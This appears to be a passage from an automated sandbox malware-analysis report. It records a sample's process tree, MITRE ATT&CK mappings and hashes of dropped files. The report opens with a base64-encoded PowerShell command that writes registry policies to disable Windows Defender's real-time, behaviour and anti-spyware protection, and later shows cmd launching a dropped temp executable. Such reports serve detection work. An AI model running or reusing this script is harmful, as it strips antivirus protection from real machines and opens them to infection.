BlACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAA9ACAAIgBTAGUAcgB2AGkAYwBlAEsAZQBlAHAAQQBsAGkAdgBlACIADQAKACQARABpAHMAYQBiAGwAZQBCAGUAaABhAHYAaQBvAHIATQBvAG4AaQB0AG8AcgBpAG4AZwBWAGEAbAB1AGUAIAAgACAAIAAgAD0AIAAiAEQAaQBzAGEAYgBsAGUAQgBlAGgAYQB2AGkAbwByAE0AbwBuAGkAdABvAHIAaQBuAGcAIgANAAoAJABEAGkAcwBhAGIAbABlAE8AbgBBAGMAYwBlAHMAcwBQAHIAbwB0AGUAYwB0AGkAbwBuAFYAYQBsAHUAZQAgACAAIAAgACAAPQAgACIARABpAHMAYQBiAGwAZQBPAG4AQQBjAGMAZQBzAHMAUAByAG8AdABlAGMAdABpAG8AbgAiAA0ACgAkAEQAaQBzAGEAYgBsAGUAUgBlAGEAbAB0AGkAbQBlAE0AbwBuAGkAdABvAHIAaQBuAGcAVgBhAGwAdQBlACAAIAAgACAAIAA9ACAAIgBEAGkAcwBhAGIAbABlAFIAZQBhAGwAdABpAG0AZQBNAG8AbgBpAHQAbwByAGkAbgBnACIADQAKACQARABpAHMAYQBiAGwAZQBTAGMAYQBuAE8AbgBSAGUAYQBsAHQAaQBtAGUARQBuAGEAYgBsAGUAVgBhAGwAdQBlACAAIAAgAD0AIAAiAEQAaQBzAGEAYgBsAGUAUwBjAGEAbgBPAG4AUgBlAGEAbAB0AGkAbQBlAEUAbgBhAGIAbABlACIADQAKACQARgBvAHIAYwBlAFUAcABkAGEAdABlAEYAcgBvAG0ATQBVAFYAYQBsAHUAZQAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAD0AIAAiAEYAbwByAGMAZQBVAHAAZABhAHQAZQBGAHIAbwBtAE0AVQAiAA0ACgAkAEQAaQBzAGEAYgBsAGUAQgBsAG8AYwBrAEEAdABGAGkAcgBzAHQAUwBlAGUAbgBWAGEAbAB1AGUAIAAgACAAIAAgACAAIAA9ACAAIgBEAGkAcwBhAGIAbABlAEIAbABvAGMAawBBAHQARgBpAHIAcwB0AFMAZQBlAG4AIgANAAoADQAKACQAVwBpAG4AZABvAHcAcwBEAGUAZgBlAG4AZABlAHIASQBzAEQAaQBzAGEAYgBsAGUAZABQAGUAcgBtAGEAbgBlAG4AdABsAHkAIAA9ACAAIgBXAGkAbgBkAG8AdwBzAEQAZQBmAGUAbgBkAGUAcgBJAHMARABpAHMAYQBiAGwAZQBkAFAAZQByAG0AYQBuAGUAbgB0AGwAeQAiAA0ACgANAAoASQBmACgAVABlAHMAdAAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAEQAZQBmAGUAbgBkAGUAcgBQAGEAdABoACkAIAB7AA0ACgAgACAAIAAgAFcAcgBpAHQAZQAtAGgAbwBzAHQAIAAtAGYAIABHAHIAZQBlAG4AIAAiAEsAZQB5ACAARQB4AGkAcwB0AHMAIQAiAA0ACgB9AA0ACgBFAGwAcwBlACAAewANAAoAIAAgACAAIABXAHIAaQB0AGUALQBoAG8AcwB0ACAALQBmACAAWQBlAGwAbABvAHcAIAAiAEsAZQB5ACAAZABvAGUAcwBuACcAdAAgAEUAeABpAHMAdABzACEAIgANAAoAIAAgACAAIABlAHgAaQB0AA0ACgB9AA0ACgANAAoAJABJAHMAQQBsAGUAYQBkAHkARABpAHMAYQBiAGwAZQBkACAAPQAgAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAiACQARABlAGYAZQBuAGQAZQByAFAAYQB0AGgAIgAgAC0ATgBhAG0AZQAgACIAJABXAGkAbgBkAG8AdwBzAEQAZQBmAGUAbgBkAGUAcgBJAHMARABpAHMAYQBiAGwAZQBkAFAAZQByAG0AYQBuAGUAbgB0AGwAeQAiACAALQBFAHIAcgBvAHIAQQBjAHQAaQBvAG4AIABTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlAA0ACgBJAGYAKAAkAEkAcwBBAGwAZQBhAGQAeQBEAGkAcwBhAGIAbABlAGQAKQANAAoAewANAAoAIAAgACAAIABXAHIAaQB0AGUALQBFAHIAcgBvAHIAIAAiAFkAbwB1ACAAaABhAHYAZQAgAGEAbAByAGUAYQBkAHkAIABkAGkAcwBhAGIAbABlAGQAIAB3AGkAbgBkAG8AdwBzACAAZABlAGYAZQBuAGQAZQByACEAIgANAAoAIAAgACAAIABQAGEAdQBzAGUADQAKACAAIAAgACAAZQB4AGkAdAANAAoAfQANAAoADQAKAE4AZQB3AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAiACQARABlAGYAZQBuAGQAZQByAFAAYQB0AGgAIgAgAC0ATgBhAG0AZQAgACIAJABXAGkAbgBkAG8AdwBzAEQAZQBmAGUAbgBkAGUAcgBJAHMARABpAHMAYQBiAGwAZQBkAFAAZQByAG0AYQBuAGUAbgB0AGwAeQAiACAALQBWAGEAbAB1AGUAIAAiADEAIgAgAC0AUAByAG8AcABlAHIAdAB5AFQAeQBwAGUAIABEAHcAbwByAGQADQAKAA0ACgAjAE4AZQB3AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACIAJABEAGUAZgBlAG4AZABlAHIAUABhAHQAaABcACQAUABvAGwAaQBjAHkATQBhAG4AYQBnAGUAcgBLAGUAeQAiAA0ACgBOAGUAdwAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAiACQARABlAGYAZQBuAGQAZQByAFAAYQB0AGgAXAAkAFIAZQBhAGwAVABpAG0AZQBQAHIAbwB0AGUAYwB0AGkAbwBuAEsAZQB5ACIADQAKAE4AZQB3AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACIAJABEAGUAZgBlAG4AZABlAHIAUABhAHQAaABcACQAUwBpAGcAbgBhAHQAdQByAGUAVQBwAGQAYQB0AGUAcwBLAGUAeQAiAA0ACgBOAGUAdwAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAiACQARABlAGYAZQBuAGQAZQByAFAAYQB0AGgAXAAkAFMAcAB5AG4AZQB0AEsAZQB5ACIADQAKAA0ACgBOAGUAdwAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBQAGEAdABoACAAIgAkAEQAZQBmAGUAbgBkAGUAcgBQAGEAdABoACIAIAAtAE4AYQBtAGUAIAAiACQAQQBsAGwAbwB3AEYAYQBzAHQAUwBlAHIAdgBpAGMAZQBTAHQAYQByAHQAdQBwAFYAYQBsAHUAZQAiACAALQBWAGEAbAB1AGUAIAAiADEAIgAgAC0AUAByAG8AcABlAHIAdAB5AFQAeQBwAGUAIABEAHcAbwByAGQADQAKAE4AZQB3AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAiACQARABlAGYAZQBuAGQAZQByAFAAYQB0AGgAIgAgAC0ATgBhAG0AZQAgACIAJABEAGkAcwBhAGIAbABlAEEAbgB0AGkAUwBwAHkAdwBhAHIAZQBWAGEAbAB1AGUAIgAgAC0AVgBhAGwAdQBlACAAIgAxACIAIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAARAB3AG8AcgBkAA0ACgBOAGUAdwAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBQAGEAdABoACAAIgAkAEQAZQBmAGUAbgBkAGUAcgBQAGEAdABoACIAIAAtAE4AYQBtAGUAIAAiACQARABpAHMAYQBiAGwAZQBBAG4AdABpAFYAaQByAHUAcwBWAGEAbAB1AGUAIgAgAC0AVgBhAGwAdQBlACAAIgAxACIAIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAARAB3AG8AcgBkAA0ACgBOAGUAdwAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBQAGEAdABoACAAIgAkAEQAZQBmAGUAbgBkAGUAcgBQAGEAdABoACIAIAAtAE4AYQBtAGUAIAAiACQARABpAHMAYQBiAGwAZQBSAG8AdQB0AGkAbgBlAGwAeQBUAGEAawBpAG4AZwBBAGMAdABpAG8AbgBWAGEAbAB1AGUAIgAgAC0AVgBhAGwAdQBlACAAIgAxACIAIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAARAB3AG8AcgBkAA0ACgBOAGUAdwAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBQAGEAdABoACAAIgAkAEQAZQBmAGUAbgBkAGUAcgBQAGEAdABoACIAIAAtAE4AYQBtAGUAIAAiACQARABpAHMAYQBiAGwAZQBTAHAAZQBjAGkAYQBsAFIAdQBuAG4AaQBuAGcATQBvAGQAZQBzAFYAYQBsAHUAZQAiACAALQBWAGEAbAB1AGUAIAAiADEAIgAgAC0AUAByAG8AcABlAHIAdAB5AFQAeQBwAGUAIABEAHcAbwByAGQADQAKAE4AZQB3AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAiACQARABlAGYAZQBuAGQAZQByAFAAYQB0AGgAIgAgAC0ATgBhAG0AZQAgACIAJABTAGUAcgB2AGkAYwBlAEsAZQBlAHAAQQBsAGkAdgBlAFYAYQBsAHUAZQAiACAALQBWAGEAbAB1AGUAIAAiADEAIgAgAC0AUAByAG8AcABlAHIAdAB5AFQAeQBwAGUAIABEAHcAbwByAGQADQAKAE4AZQB3AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAiACQARABlAGYAZQBuAGQAZQByAFAAYQB0AGgAIgAgAC0ATgBhAG0AZQAgACIAJABEAGkAcwBhAGIAbABlAFIAZQBhAGwAdABpAG0AZQBNAG8AbgBpAHQAbwByAGkAbgBnAFYAYQBsAHUAZQAiACAALQBWAGEAbAB1AGUAIAAiADEAIgAgAC0AUAByAG8AcABlAHIAdAB5AFQAeQBwAGUAIABEAHcAbwByAGQADQAKAA0ACgBOAGUAdwAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBQAGEAdABoACAAIgAkAEQAZQBmAGUAbgBkAGUAcgBQAGEAdABoAFwAJABSAGUAYQBsAFQAaQBtAGUAUAByAG8AdABlAGMAdABpAG8AbgBLAGUAeQAiACAALQBOAGEAbQBlACAAIgAkAEQAaQBzAGEAYgBsAGUAQgBlAGgAYQB2AGkAbwByAE0AbwBuAGkAdABvAHIAaQBuAGcAVgBhAGwAdQBlACIAIAAtAFYAYQBsAHUAZQAgACIAMQAiACAALQBQAHIAbwBwAGUAcgB0AHkAVAB5AHAAZQAgAEQAdwBvAHIAZAANAAoATgBlAHcALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AUABhAHQAaAAgACIAJABEAGUAZgBlAG4AZABlAHIAUABhAHQAaABcACQAUgBlAGEAbABUAGkAbQBlAFAAcgBvAHQAZQBjAHQAaQBvAG4ASwBlAHkAIgAgAC0ATgBhAG0AZQAgACIAJABEAGkAcwBhAGIAbABlAE8AbgBBAGMAYwBlAHMAcwBQAHIAbwB0AGUAYwB0AGkAbwBuAFYAYQBsAHUAZQAiACAALQBWAGEAbAB1AGUAIAAiADEAIgAgAC0AUAByAG8AcABlAHIAdAB5AFQAeQBwAGUAIABEAHcAbwByAGQADQAKAE4AZQB3AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAiACQARABlAGYAZQBuAGQAZQByAFAAYQB0AGgAXAAkAFIAZQBhAGwAVABpAG0AZQBQAHIAbwB0AGUAYwB0AGkAbwBuAEsAZQB5ACIAIAAtAE4AYQBtAGUAIAAiACQARABpAHMAYQBiAGwAZQBSAGUAYQBsAHQAaQBtAGUATQBvAG4AaQB0AG8AcgBpAG4AZwBWAGEAbAB1AGUAIgAgAC0AVgBhAGwAdQBlACAAIgAxACIAIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAARAB3AG8AcgBkAA0ACgBOAGUAdwAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBQAGEAdABoACAAIgAkAEQAZQBmAGUAbgBkAGUAcgBQAGEAdABoAFwAJABSAGUAYQBsAFQAaQBtAGUAUAByAG8AdABlAGMAdABpAG8AbgBLAGUAeQAiACAALQBOAGEAbQBlACAAIgAkAEQAaQBzAGEAYgBsAGUAUwBjAGEAbgBPAG4AUgBlAGEAbAB0AGkAbQBlAEUAbgBhAGIAbABlAFYAYQBsAHUAZQAiACAALQBWAGEAbAB1AGUAIAAiADEAIgAgAC0AUAByAG8AcABlAHIAdAB5AFQAeQBwAGUAIABEAHcAbwByAGQADQAKAA0ACgBOAGUAdwAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBQAGEAdABoACAAIgAkAEQAZQBmAGUAbgBkAGUAcgBQAGEAdABoAFwAJABTAGkAZwBuAGEAdAB1AHIAZQBVAHAAZABhAHQAZQBzAEsAZQB5ACIAIAAtAE4AYQBtAGUAIAAiACQARgBvAHIAYwBlAFUAcABkAGEAdABlAEYAcgBvAG0ATQBVAFYAYQBsAHUAZQAiACAALQBWAGEAbAB1AGUAIAAiADEAIgAgAC0AUAByAG8AcABlAHIAdAB5AFQAeQBwAGUAIABEAHcAbwByAGQADQAKAA0ACgBOAGUAdwAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBQAGEAdABoACAAIgAkAEQAZQBmAGUAbgBkAGUAcgBQAGEAdABoAFwAJABTAHAAeQBuAGUAdABLAGUAeQAiACAALQBOAGEAbQBlACAAIgAkAEQAaQBzAGEAYgBsAGUAQgBsAG8AYwBrAEEAdABGAGkAcgBzAHQAUwBlAGUAbgBWAGEAbAB1AGUAIgAgAC0AVgBhAGwAdQBlACAAIgAxACIAIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAARAB3AG8AcgBkAA0ACgANAAoAUABhAHUAcwBlAA==
  2⤵
  - Modifies Windows Defender Real-time Protection settings
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4348
- C:\Windows\SYSTEM32\cmd.exe
  "cmd" /k timeout 10 > NUL && "C:\Users\Admin\AppData\Local\Temp\tmpE309.tmp.exe"
  2⤵
  PID:4292
- - C:\Windows\system32\timeout.exe
    timeout 10
    3⤵
    - Delays execution with timeout.exe
    PID:4836
- - C:\Users\Admin\AppData\Local\Temp\tmpE309.tmp.exe
    "C:\Users\Admin\AppData\Local\Temp\tmpE309.tmp.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    PID:1712

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s NPSMSvc
1⤵
PID:568

C:\Windows\System32\oobe\UserOOBEBroker.exe
C:\Windows\System32\oobe\UserOOBEBroker.exe -Embedding
1⤵
- Drops file in Windows directory
PID:2432

C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileCoAuth.exe
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileCoAuth.exe -Embedding
1⤵
- System Location Discovery: System Language Discovery
PID:4820

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:584

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Suspicious use of SetWindowsHookEx
PID:4292

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Suspicious use of SetWindowsHookEx
PID:1564

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Drops file in Windows directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3160
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fff0664cc40,0x7fff0664cc4c,0x7fff0664cc58
  2⤵
  PID:4848
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1804,i,4452383789327986162,8385148185687650023,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1796 /prefetch:2
  2⤵
  PID:1336
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2108,i,4452383789327986162,8385148185687650023,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2120 /prefetch:3
  2⤵
  PID:1352
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2196,i,4452383789327986162,8385148185687650023,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2140 /prefetch:8
  2⤵
  PID:316
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3080,i,4452383789327986162,8385148185687650023,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3124 /prefetch:1
  2⤵
  PID:3396
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3128,i,4452383789327986162,8385148185687650023,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3184 /prefetch:1
  2⤵
  PID:3288
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4432,i,4452383789327986162,8385148185687650023,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4452 /prefetch:1
  2⤵
  PID:1604
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4572,i,4452383789327986162,8385148185687650023,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4744 /prefetch:8
  2⤵
  PID:4148
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4840,i,4452383789327986162,8385148185687650023,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4772 /prefetch:8
  2⤵
  PID:3856
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4628,i,4452383789327986162,8385148185687650023,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5056 /prefetch:8
  2⤵
  PID:3556
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5020,i,4452383789327986162,8385148185687650023,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5012 /prefetch:8
  2⤵
  PID:4972
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5024,i,4452383789327986162,8385148185687650023,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4744 /prefetch:8
  2⤵
  PID:4692
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5144,i,4452383789327986162,8385148185687650023,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4464 /prefetch:8
  2⤵
  PID:4836
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --field-trial-handle=5260,i,4452383789327986162,8385148185687650023,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5244 /prefetch:2
  2⤵
  PID:2472

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:1076

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:260

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
1⤵
PID:8

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Credential Access

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\93f336c6-cc1f-4975-9442-4f4f5adf5160.tmp

Filesize
9KB

MD5
fe06141aa017cec866399bba831765ba

SHA1
59401cd0e513a1536926a13339baf13db3ff5285

SHA256
ddc4843fad0670fa2112d2f349f9255b8ee32d621a292ff103874c7fe4a097af

SHA512
85a73194885012ed91b47da7b0f608646729b1c68bb77f92acd3269d36480453e36893ff3b6bbc4873210cf22cfbf02826b21ab166fdf877d44d2a0c191cd14c

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

Filesize
649B

MD5
ce06def2d54b984e9ce6c7ba08850dfa

SHA1
d8f3f19d5466cce79b08e4fd7776493f771d8f2c

SHA256
449b6bac726ad34abeff33bb3bb58d7879c2e99b949a497183c59763903da505

SHA512
b9adeefea9cad337589db1959d0093ea67358e8c335fcee5bb9efd89e669e9bea9dafe941c047eebe75d91bb0c2d4f7691562171e37bdfe21795fdc3bfa50db9

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.85.1_0\_locales\en\messages.json

Filesize
851B

MD5
07ffbe5f24ca348723ff8c6c488abfb8

SHA1
6dc2851e39b2ee38f88cf5c35a90171dbea5b690

SHA256
6895648577286002f1dc9c3366f558484eb7020d52bbf64a296406e61d09599c

SHA512
7ed2c8db851a84f614d5daf1d5fe633bd70301fd7ff8a6723430f05f642ceb3b1ad0a40de65b224661c782ffcec69d996ebe3e5bb6b2f478181e9a07d8cd41f6

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.85.1_0\dasherSettingSchema.json

Filesize
854B

MD5
4ec1df2da46182103d2ffc3b92d20ca5

SHA1
fb9d1ba3710cf31a87165317c6edc110e98994ce

SHA256
6c69ce0fe6fab14f1990a320d704fee362c175c00eb6c9224aa6f41108918ca6

SHA512
939d81e6a82b10ff73a35c931052d8d53d42d915e526665079eeb4820df4d70f1c6aebab70b59519a0014a48514833fefd687d5a3ed1b06482223a168292105d

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
1KB

MD5
6cc14cafaffad0cc6ab98b1c3c932d11

SHA1
ebc210658d71eab5e6d204f5e1a000f4f9268145

SHA256
5dff3cc1daad06eab035dec3a79e4f09b767e2d458bc6b44d95498ce802ac176

SHA512
a06248d8c1c9239769d0e0861ad87c82de77e546756dc189566b35efedfb8e2bf9de816a51eaa96cdf29ec4c2c07fc626fe53593a2491b62e459f03d889f8069

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
356B

MD5
35ae2f9d7022163c9d92326aa3da6c44

SHA1
a7227a0f686b72bf2c47a4c61bd210f32b21f5d9

SHA256
1c4696b765396f7a434dfb618fe0f2576f3398b70c1972077104ab1c95348eef

SHA512
c78e84c56ae692cf67a33e66f0e565bc0487feb5e751ba73b8a7af32133e40474ef3de7b57924811c37083c9fe4b1eddf7b73af6aa39ed4943c949861a7bf784

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
28a3523344cda9e9638881db3089cc6a

SHA1
e17df3b5e308b4b6586b4b41301519b36cd127be

SHA256
5bc457bbc391e78c3bc59f215ff9df2359b0b837caa8ca82918a0d0caf3a969b

SHA512
3f8c8165cda19e0ca7e69e9f59e71b56599e8667a0e876643ee64e9598d516b999ad2020f37cac22413f6cd6fd98ed5f35e8602e850b30c3856e44657a454686

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
6d4af0a2c837454788cb5dfbe226a545

SHA1
f8fdcecded67eb99027e6ac1c638ecc8fc73d499

SHA256
2d6a5b163c73f5c6b6b4d83fd6f69c052bf54bb2ac9b7ea22d5a8978837caa4b

SHA512
63151fc073d52a8ac866657afc026983749f99cb72702c0faedaea0453ec469bb262db0a8fdf9f2cca436a8d1ebf21b6c036c19e7a245e4fae81c57f4534d46a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
e6c3a6fcf9581172ca9312bcfb07119c

SHA1
0bea5e8dc6c79f37b6096a5702aa0861cd9a0bdc

SHA256
e3f66a72e55972920cf6a531c2252117ad4b9b940a9b2ab91c56108ce63f2e24

SHA512
fc79501b9de0a60d1fc19e073221a935daed252c1e0a5e40897576d1bfbf7f45d8216d589a3fbca6064089dbec7dfbfcb3299d86651b9998aedfadb324c8a971

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
521753a651a5b27307664551fd86beab

SHA1
50b829376d410ab91218c3e9104f89e3413e05e5

SHA256
ba145fae8253b6225bcdb05ad9134a695c058e3b187650c6dc41e0d1f8e73d05

SHA512
39ff2fde8dc661d1c33c7c05b3a1e4c82055fc046c4975f8644da5f0d2406b96741c505ce5c7092759a3b80af3aaa77c985e2c0e724b8660f52e3d237020857f

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

Filesize
15KB

MD5
6ee281f35fd96e78ec5b3655c8b0b411

SHA1
8cc7ee5604fe7df013701c7a3dd0d62801ba3f0b

SHA256
d151a03293e347f356fad5e74fd9ab6a4371372e670ff2e3582d97dc809521f3

SHA512
a3c7c24e8176504dee37b6a07145d8d4ca1e71cc95361c6b367dcab9af6e4f39fd1ffab404b11c7aeac713b0e66be17ae947b3cbd71b7628fb30383f4f8b94f7

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

Filesize
72B

MD5
